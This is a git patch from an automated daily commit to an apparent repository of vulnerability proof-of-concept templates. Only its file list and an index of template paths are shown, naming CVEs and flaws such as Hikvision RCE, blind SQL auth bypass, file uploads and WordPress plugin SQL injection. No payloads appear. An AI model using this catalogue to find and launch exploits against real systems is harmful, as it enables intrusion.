From 97eb6f52f7b073d24ce107b81c49131ae84b861f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 Aug 2024 12:38:48 +0000 Subject: [PATCH] 20240829 --- date.txt | 2 +- poc.txt | 93 +++++++++++++++++++ poc/auth/BlindSQLAuth.yaml | 66 ++++++------- "poc/cve/CVE-2021\342\200\22320837.yaml" | 43 ++++++--- ...2440-d3549549b7d1d1f9c5181225b19ec097.yaml | 59 ++++++++++++ ...6858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml | 59 ++++++++++++ ...1056-67c2890890023e1dcaf3fcf02b7286ad.yaml | 59 ++++++++++++ ...1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml | 59 ++++++++++++ ...2541-49857937876d85d5d1abd5bfb380cf51.yaml | 59 ++++++++++++ ...3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml | 59 ++++++++++++ ...3679-027fedcab741a41badcd943e1f2670dd.yaml | 59 ++++++++++++ ...7540-41966b5363ceb49c1002bf890479040a.yaml | 59 ++++++++++++ ...7921-32c9b35565d965fce9f085fa275f2788.yaml | 59 ++++++++++++ ...3944-1cac4b0f9145e2f8f8e951e09918d457.yaml | 59 ++++++++++++ ...9638-69edc4c284df671b2ba465627be06431.yaml | 59 ++++++++++++ ...3915-77573ddf79e044c9a0d67924130e634b.yaml | 59 ++++++++++++ ...3916-1015b08d9eca60e9a1481bb46ac69da5.yaml | 59 ++++++++++++ ...3917-4df54e0a00866edc142ed2d2dc516949.yaml | 59 ++++++++++++ ...3918-36bcfe8513ceb7715d00cdc97a346f97.yaml | 59 ++++++++++++ ...3966-46b00b07942b65c4dcb18883031ed53e.yaml | 59 ++++++++++++ ...3967-5df69edf490a8e0fdecd3e9d85b38254.yaml | 59 ++++++++++++ ...5857-3d292977eef774943a0aa421905b95f9.yaml | 59 ++++++++++++ ...5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml | 59 ++++++++++++ poc/cve/CVE-2024-6311.yaml | 59 ++++++++++++ poc/cve/CVE-2024-6312.yaml | 59 ++++++++++++ ...6330-4e4c561294cfdcf71842373037d4d2e3.yaml | 59 ++++++++++++ poc/cve/CVE-2024-6448.yaml | 59 ++++++++++++ ...6451-07f7ccbed8a5e6918f12a0374cac643f.yaml | 59 ++++++++++++ ...6551-71cd34e5a5ee9991ff68a34f6b666def.yaml | 59 ++++++++++++ ...6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml | 59 ++++++++++++ ...6879-408050f5fa9936779918006e4415cd11.yaml | 59 ++++++++++++ ...7030-1f332171cf5ea8b289acd21b158dc3ee.yaml | 59 ++++++++++++ ...7032-cabe7edb9453e46b358c075428df2586.yaml | 59 ++++++++++++ ...7313-b762e54f8085d18804da0898542a5ec1.yaml | 59 ++++++++++++ ...7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml | 59 ++++++++++++ poc/cve/CVE-2024-7447.yaml | 59 ++++++++++++ poc/cve/CVE-2024-7573.yaml | 59 ++++++++++++ ...7606-06ad2ab98249fa61f169a794d53b3d8d.yaml | 59 ++++++++++++ ...7607-4e7f3690990262b436b42cdf215f4676.yaml | 59 ++++++++++++ ...7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml | 59 ++++++++++++ ...7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml | 59 ++++++++++++ poc/cve/CVE-2024-7863.yaml | 59 ++++++++++++ ...7895-ac1e11d6be8490c8494a930a375e9a8e.yaml | 59 ++++++++++++ poc/cve/CVE-2024-8030.yaml | 59 ++++++++++++ ...8043-613641adfae0294950a0fa915c4316f4.yaml | 59 ++++++++++++ ...8044-c5c06b8842bfb695b2f240b2af75787b.yaml | 59 ++++++++++++ ...8047-f6817d306b4651cd60631b6b036a3959.yaml | 59 ++++++++++++ ...8051-13d32e37d22c86e6841489ccba7dbaab.yaml | 59 ++++++++++++ ...8052-e7604b09bc8937658ab6d84d35011faf.yaml | 59 ++++++++++++ ...8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml | 59 ++++++++++++ poc/cve/CVE-2024-8195.yaml | 59 ++++++++++++ poc/cve/cve-2016-6210.yaml | 8 +- poc/cve/cve-2017-14524.yaml | 42 ++++++--- poc/cve/cve-2018-1271.yaml | 16 ++-- poc/cve/cve-2018-15473.yaml | 14 +-- poc/cve/cve-2018-18778.yaml | 11 +-- .../salesforce-contentdocument-detector.yaml | 37 ++++++++ poc/exposed/exposed-springboot.yaml | 8 +- poc/http/cl-te-http-smuggling.yaml | 72 +++++++------- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 ++++++---- .../Hikvision_iVMS-8700_upload_action.yaml | 40 ++++---- ...orms-881dfd77d6d86c39aaa256deaef65e79.yaml | 59 ++++++++++++ .../dahua-wpms-addimgico-fileupload.yaml | 78 ++++++++++------ ...free-d673e9b78beed9be045c9fddcda8387c.yaml | 59 ++++++++++++ ...tems-27adb5630206288cc4533169053590e1.yaml | 59 ++++++++++++ ...eams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml | 59 ++++++++++++ poc/other/Dahua_getUserInfoByUserName.yaml | 18 ++-- .../Hikvision_Env_Information_Leakage.yaml | 42 +++++---- poc/other/Ruijie_EXCU_SHELL.yaml | 30 +++--- ...gine-3bae955ccade96ed3bb2f0c913880abb.yaml | 59 ++++++++++++ ...olio-937e73528345004677d696748421a9a3.yaml | 59 ++++++++++++ ...sion-7f5f101995ccdcf10c7e7f5808c934b6.yaml | 59 ++++++++++++ ...stem-8649e5bc1fc86fb49801894149b7194d.yaml | 59 ++++++++++++ ...quiz-e57df0d2ff1d620125911e7a7435441f.yaml | 59 ++++++++++++ ...cker-707207d8728290146b99c3b10fa2d8a1.yaml | 59 ++++++++++++ poc/other/dom-invaider.yaml | 15 +-- ...sers-90df2a922aebe8c48da99b7fe999c319.yaml | 59 ++++++++++++ ...-pro-eb1e588869835492ad97803c9c5af7ab.yaml | 59 ++++++++++++ ...give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml | 59 ++++++++++++ ...wrap-ac5f97e3e98b5cccd5e941c630594293.yaml | 59 ++++++++++++ ...plus-305e1ca5563918c203ad44639d735fe6.yaml | 59 ++++++++++++ poc/other/mobile-security-framework.yaml | 20 ++++ ...naar-d5f0e031999dc4b1252ad5515dddcfaf.yaml | 59 ++++++++++++ ...pack-016f4f965dace571e947d960d2934b03.yaml | 59 ++++++++++++ ...next-a245f156676109e1d14f3370b00c9905.yaml | 59 ++++++++++++ ...tags-3f67e2b8c30c94499ec4eae8289c70a2.yaml | 59 ++++++++++++ ...ndar-cff64aa365787e00304f119ad6984b45.yaml | 59 ++++++++++++ ...grid-11c57e46d323949f1474677c8ea8f409.yaml | 59 ++++++++++++ ...weet-250b3e7014946f4e8b446448451f1a15.yaml | 59 ++++++++++++ ...-pro-feb88140040e1c1f4c2ea5be5291d525.yaml | 59 ++++++++++++ ...ager-ae04686326d43f919e9c393e1e364c95.yaml | 59 ++++++++++++ .../Hikvision_applyCT_RCE.yaml | 45 ++++++--- .../salesforce-contentdocument-detector.yaml | 37 ++++++++ ...list-0ce5399103aadb3b44c880eafe1a56e5.yaml | 59 ++++++++++++ ...ugin-7e067968dc74df931237c1c4dd7e5960.yaml | 59 ++++++++++++ poc/search/relevanssi-live-ajax-search.yaml | 59 ++++++++++++ poc/sql/BlindSQLAuth.yaml | 66 ++++++------- ...7032-cabe7edb9453e46b358c075428df2586.yaml | 59 ++++++++++++ ...7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml | 59 ++++++++++++ ...8051-13d32e37d22c86e6841489ccba7dbaab.yaml | 59 ++++++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 49 +++++++--- ...sers-947badb91b071755d9969be9242e4456.yaml | 59 ++++++++++++ ...lder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml | 59 ++++++++++++ ...tems-27adb5630206288cc4533169053590e1.yaml | 59 ++++++++++++ ...itor-28b564b15db8ff756b87ff0ae5c6d260.yaml | 59 ++++++++++++ ...list-0ce5399103aadb3b44c880eafe1a56e5.yaml | 59 ++++++++++++ ...ager-2f2a157dfc44eea8c90827e9ff434dbb.yaml | 59 ++++++++++++ poc/sql_injection/BlindSQLAuth.yaml | 66 ++++++------- ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 49 +++++++--- poc/upload/Dahua_Video_FileUpload.yaml | 42 +++------ ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 ++++++---- .../Hikvision_iVMS-8700_upload_action.yaml | 40 ++++---- .../Nsfocus_NF_Firewall_FileUpload.yaml | 31 +------ .../dahua-wpms-addimgico-fileupload.yaml | 78 ++++++++++------ ...ecology_E-Office_Uploadify_FileUpload.yaml | 30 ++++-- .../dahua-wpms-addimgico-fileupload.yaml | 78 ++++++++++------ ...y-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml | 59 ++++++++++++ ...lper-2ebee88d3cc127551f1f7c34b744653e.yaml | 59 ++++++++++++ ...wall-2453dc94f5e62cf781881087cb516889.yaml | 59 ++++++++++++ ...lder-096fe66e1a6c03883512b366b27ff120.yaml | 59 ++++++++++++ ...dget-71769af2cc0004162bfc766437dc74d0.yaml | 59 ++++++++++++ ...dget-82d487f0b8fd6103c1335305b84fab11.yaml | 59 ++++++++++++ ...todo-d321c83fc92b177a4feede0546be070b.yaml | 59 ++++++++++++ 123 files changed, 6159 insertions(+), 511 deletions(-) create mode 100644 poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml create mode 100644 poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml create mode 100644 poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml create mode 100644 poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml create mode 100644 poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml create mode 100644 poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml create mode 100644 poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml create mode 100644 poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml create mode 100644 poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml create mode 100644 poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml create mode 100644 poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml create mode 100644 poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml create mode 100644 poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml create mode 100644 poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml create mode 100644 poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml create mode 100644 poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml create mode 100644 poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml create mode 100644 poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml create mode 100644 poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml create mode 100644 poc/cve/CVE-2024-6311.yaml create mode 100644 poc/cve/CVE-2024-6312.yaml create mode 100644 poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml create mode 100644 poc/cve/CVE-2024-6448.yaml create mode 100644 poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml create mode 100644 poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml create mode 100644 poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml create mode 100644 poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml create mode 100644 poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml create mode 100644 poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml create mode 100644 poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml create mode 100644 poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml create mode 100644 poc/cve/CVE-2024-7447.yaml create mode 100644 poc/cve/CVE-2024-7573.yaml create mode 100644 poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml create mode 100644 poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml create mode 100644 poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml create mode 100644 poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml create mode 100644 poc/cve/CVE-2024-7863.yaml create mode 100644 poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml create mode 100644 poc/cve/CVE-2024-8030.yaml create mode 100644 poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml create mode 100644 poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml create mode 100644 poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml create mode 100644 poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml create mode 100644 poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml create mode 100644 poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml create mode 100644 poc/cve/CVE-2024-8195.yaml create mode 100644 poc/detect/salesforce-contentdocument-detector.yaml create mode 100644 poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml create mode 100644 poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml create mode 100644 poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml create mode 100644 poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml create mode 100644 poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml create mode 100644 poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml create mode 100644 poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml create mode 100644 poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml create mode 100644 poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml create mode 100644 poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml create mode 100644 poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml create mode 100644 poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml create mode 100644 poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml create mode 100644 poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml create mode 100644 poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml create mode 100644 poc/other/mobile-security-framework.yaml create mode 100644 poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml create mode 100644 poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml create mode 100644 poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml create mode 100644 poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml create mode 100644 poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml create mode 100644 poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml create mode 100644 poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml create mode 100644 poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml create mode 100644 poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml create mode 100644 poc/remote_code_execution/salesforce-contentdocument-detector.yaml create mode 100644 poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml create mode 100644 poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml create mode 100644 poc/search/relevanssi-live-ajax-search.yaml create mode 100644 poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml create mode 100644 poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml create mode 100644 poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml create mode 100644 poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml create mode 100644 poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml create mode 100644 poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml create mode 100644 poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml create mode 100644 poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml create mode 100644 poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml create mode 100644 poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml create mode 100644 poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml create mode 100644 poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml create mode 100644 poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml create mode 100644 poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml create mode 100644 poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml create mode 100644 poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml diff --git a/date.txt b/date.txt index 00e43a06f4..0b8bcefbec 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240828 +20240829 diff --git a/poc.txt b/poc.txt index 989db77c8f..1b03bfc2df 100644 --- a/poc.txt +++ b/poc.txt @@ -20007,6 +20007,7 @@ ./poc/cve/CVE-2022-2438-e23067b73cd2465094908dfe66e68a56.yaml ./poc/cve/CVE-2022-2438.yaml ./poc/cve/CVE-2022-24384.yaml +./poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml ./poc/cve/CVE-2022-2441-94e48155bec5b25aea537c2fd89d3e2c.yaml ./poc/cve/CVE-2022-2441.yaml ./poc/cve/CVE-2022-2442-7a5fbc6b620266c52d8b0c6db0f4ba91.yaml @@ -22724,6 +22725,7 @@ ./poc/cve/CVE-2022-46856.yaml ./poc/cve/CVE-2022-46857-6eea60cd30202102fb633d2eef77e143.yaml ./poc/cve/CVE-2022-46857.yaml +./poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml ./poc/cve/CVE-2022-46858-64552307c89bcb47f6d5ba59e80e5c98.yaml ./poc/cve/CVE-2022-46858.yaml ./poc/cve/CVE-2022-46859-5e59d6d5372551970b346415e4d96b7b.yaml @@ -33073,6 +33075,7 @@ ./poc/cve/CVE-2024-1054.yaml ./poc/cve/CVE-2024-1055-d648797daf2d40f2e3020df2557ea8d6.yaml ./poc/cve/CVE-2024-1055.yaml +./poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml ./poc/cve/CVE-2024-1057.yaml ./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml @@ -33409,6 +33412,7 @@ ./poc/cve/CVE-2024-1382.yaml ./poc/cve/CVE-2024-1383-7b045eb38e258dc8f4536f2cc37c96c3.yaml ./poc/cve/CVE-2024-1383.yaml +./poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml ./poc/cve/CVE-2024-1385-818100a011ddc865608e7783aa650542.yaml ./poc/cve/CVE-2024-1385.yaml ./poc/cve/CVE-2024-1386-9f49adb4a1553fb7e5f119061067e3f5.yaml @@ -34842,6 +34846,7 @@ ./poc/cve/CVE-2024-2538.yaml ./poc/cve/CVE-2024-2539-7c8ec8552fe31674d2a09f50099b62db.yaml ./poc/cve/CVE-2024-2539.yaml +./poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml ./poc/cve/CVE-2024-2542-c8a8658aca4fa9d4ee0855526de65460.yaml ./poc/cve/CVE-2024-2542.yaml ./poc/cve/CVE-2024-2543-f48246ffc4fb98da59759110814c6ac9.yaml @@ -37168,6 +37173,7 @@ ./poc/cve/CVE-2024-32818.yaml ./poc/cve/CVE-2024-32819-b2efe288ed999c4e86752c15cb39df1e.yaml ./poc/cve/CVE-2024-32819.yaml +./poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml ./poc/cve/CVE-2024-32820-71e856bbfeae5e39e580699130259df9.yaml ./poc/cve/CVE-2024-32820.yaml ./poc/cve/CVE-2024-32821-a1073ef2fb823793f35d551971666c90.yaml @@ -38480,6 +38486,7 @@ ./poc/cve/CVE-2024-3677.yaml ./poc/cve/CVE-2024-3678-f53f05c8b6a185799c66e4e83f0a7ba4.yaml ./poc/cve/CVE-2024-3678.yaml +./poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml ./poc/cve/CVE-2024-3680-23ea719e8617bbc7e76892e92d138752.yaml ./poc/cve/CVE-2024-3680-ec7d53ee9433a071987bdb6ca3443c79.yaml ./poc/cve/CVE-2024-3680.yaml @@ -38987,6 +38994,7 @@ ./poc/cve/CVE-2024-37539.yaml ./poc/cve/CVE-2024-3754-5cb1674c7f47c3b022a3d4bf7b71ef2e.yaml ./poc/cve/CVE-2024-3754.yaml +./poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml ./poc/cve/CVE-2024-37540-8cbf618dd92d73c44ede2777170fcf11.yaml ./poc/cve/CVE-2024-37540.yaml ./poc/cve/CVE-2024-37543-45498458ade80405d5c87896b7d832be.yaml @@ -39050,6 +39058,7 @@ ./poc/cve/CVE-2024-37919.yaml ./poc/cve/CVE-2024-37920-335be5b5f325b697f46824959f7e9689.yaml ./poc/cve/CVE-2024-37920.yaml +./poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml ./poc/cve/CVE-2024-37922-871cb4ded694b4a55787d352462ee8a0.yaml ./poc/cve/CVE-2024-37922.yaml ./poc/cve/CVE-2024-37923-6a14d11a54353b3a8db40e6351e11b46.yaml @@ -39545,6 +39554,7 @@ ./poc/cve/CVE-2024-3942.yaml ./poc/cve/CVE-2024-3943-fa7581cdf62fb0e87bf4eab4b31bd83c.yaml ./poc/cve/CVE-2024-3943.yaml +./poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml ./poc/cve/CVE-2024-3945-018f8088237d45b71c8d194c577272ca.yaml ./poc/cve/CVE-2024-3945.yaml ./poc/cve/CVE-2024-3946-c60d5b669b2319d7b35ed61c7b3c3d22.yaml @@ -39602,6 +39612,7 @@ ./poc/cve/CVE-2024-39636.yaml ./poc/cve/CVE-2024-39637-b2aa75dc928f753243f5e3cd1c699516.yaml ./poc/cve/CVE-2024-39637.yaml +./poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml ./poc/cve/CVE-2024-39639-87f7d58a0766d71b6c41d8120ed1777a.yaml ./poc/cve/CVE-2024-39639.yaml ./poc/cve/CVE-2024-3964-056dc5456ab6841bec0c77f7e0bf35ff.yaml @@ -40411,10 +40422,16 @@ ./poc/cve/CVE-2024-4390.yaml ./poc/cve/CVE-2024-4391-985e97773b03a11e8b2a9fb7940543b5.yaml ./poc/cve/CVE-2024-4391.yaml +./poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml +./poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml +./poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml +./poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml ./poc/cve/CVE-2024-4392-82902aa50e08075fddd71499e6afbe8c.yaml ./poc/cve/CVE-2024-4392.yaml ./poc/cve/CVE-2024-4393-45e2b89ab04106f575ed8b1663572c75.yaml ./poc/cve/CVE-2024-4393.yaml +./poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml +./poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml ./poc/cve/CVE-2024-4397-c362279c76703f9b7d6880221e199134.yaml ./poc/cve/CVE-2024-4397.yaml ./poc/cve/CVE-2024-4398-7665e7d89d07848b27bc3ed2a158e28c.yaml @@ -41364,6 +41381,7 @@ ./poc/cve/CVE-2024-5855.yaml ./poc/cve/CVE-2024-5856-f4b3755f41d76fe6fb4177e59e83affd.yaml ./poc/cve/CVE-2024-5856.yaml +./poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml ./poc/cve/CVE-2024-5858-8478fd188db095b50a710c21aa308605.yaml ./poc/cve/CVE-2024-5858.yaml ./poc/cve/CVE-2024-5859-c33eb50a462c617bcdf763f4fbbb0f02.yaml @@ -41435,6 +41453,7 @@ ./poc/cve/CVE-2024-5975-63142a8dc0e1975c354668fd03c9e205.yaml ./poc/cve/CVE-2024-5977-4c5264cce514f6cea533513004f89b25.yaml ./poc/cve/CVE-2024-5977.yaml +./poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml ./poc/cve/CVE-2024-5992-17371c3c551fc1c7a97635e9a49f9659.yaml ./poc/cve/CVE-2024-5992-2b755cd88a4a27a7b1b3570016d83b8e.yaml ./poc/cve/CVE-2024-5992.yaml @@ -41625,7 +41644,9 @@ ./poc/cve/CVE-2024-6310-0419671d8f80f6b6a9d502c2d8ba3340.yaml ./poc/cve/CVE-2024-6310.yaml ./poc/cve/CVE-2024-6311-d89cc033454f8c35267fb7ae63d8e47c.yaml +./poc/cve/CVE-2024-6311.yaml ./poc/cve/CVE-2024-6312-b9fa815eabbece02fbe913e892ae3664.yaml +./poc/cve/CVE-2024-6312.yaml ./poc/cve/CVE-2024-6313-167d3456f11a505fc0773b04d8885737.yaml ./poc/cve/CVE-2024-6313.yaml ./poc/cve/CVE-2024-6314-a8fb870094e2797c6be405b1023e20a9.yaml @@ -41646,6 +41667,7 @@ ./poc/cve/CVE-2024-6321.yaml ./poc/cve/CVE-2024-6328-dcb1447304523613e0a565cd368725f8.yaml ./poc/cve/CVE-2024-6328.yaml +./poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml ./poc/cve/CVE-2024-6334.yaml ./poc/cve/CVE-2024-6338-2cb15f594519463fb002e59f93b4f8b0.yaml @@ -41694,6 +41716,8 @@ ./poc/cve/CVE-2024-6447-1130432e15f90ec4bd6402483af13599.yaml ./poc/cve/CVE-2024-6447.yaml ./poc/cve/CVE-2024-6448-6501d01ff6b00a92c3945ba82a07cc38.yaml +./poc/cve/CVE-2024-6448.yaml +./poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml ./poc/cve/CVE-2024-6455-d3c25371d6b0981179823fa90a262c4e.yaml ./poc/cve/CVE-2024-6455.yaml ./poc/cve/CVE-2024-6457-8fe82c0d2bc0d7c6719dbb664464107d.yaml @@ -41764,6 +41788,7 @@ ./poc/cve/CVE-2024-6549.yaml ./poc/cve/CVE-2024-6550-879ce5421f391ab061ab24b1a7b2f495.yaml ./poc/cve/CVE-2024-6550.yaml +./poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml ./poc/cve/CVE-2024-6552-e7ac760f6e93c0dbf11edf688d8d1c1e.yaml ./poc/cve/CVE-2024-6552.yaml ./poc/cve/CVE-2024-6553-9d3dee97ff0d9472e213f39b23874043.yaml @@ -41890,6 +41915,7 @@ ./poc/cve/CVE-2024-6712.yaml ./poc/cve/CVE-2024-6713-721684c67d2a1a8a863ea18abb9bf88d.yaml ./poc/cve/CVE-2024-6713.yaml +./poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml ./poc/cve/CVE-2024-6718-248ea11ff135db64e4802002a7613eb0.yaml ./poc/cve/CVE-2024-6718.yaml ./poc/cve/CVE-2024-6720-55495b760f061287bdd9b98d9853a7dd.yaml @@ -41960,6 +41986,7 @@ ./poc/cve/CVE-2024-6870.yaml ./poc/cve/CVE-2024-6872-906780e4d16fb616e7eb84af4109c545.yaml ./poc/cve/CVE-2024-6872.yaml +./poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml ./poc/cve/CVE-2024-6883-60bd6a9f405aa3424be36169fb71a51f.yaml ./poc/cve/CVE-2024-6883-bf3d691e7629ebe7204e53eef0a10a24.yaml ./poc/cve/CVE-2024-6883.yaml @@ -41989,11 +42016,13 @@ ./poc/cve/CVE-2024-6987.yaml ./poc/cve/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml ./poc/cve/CVE-2024-7027.yaml +./poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml ./poc/cve/CVE-2024-7030-402f3274f80cf86dfc85b2b1e92bfb4d.yaml ./poc/cve/CVE-2024-7030.yaml ./poc/cve/CVE-2024-7031-35ed976385b4bbf47941a83215c20034.yaml ./poc/cve/CVE-2024-7031.yaml ./poc/cve/CVE-2024-7032-5e5f51c1ac280ac9a47a523a59464bd7.yaml +./poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml ./poc/cve/CVE-2024-7032.yaml 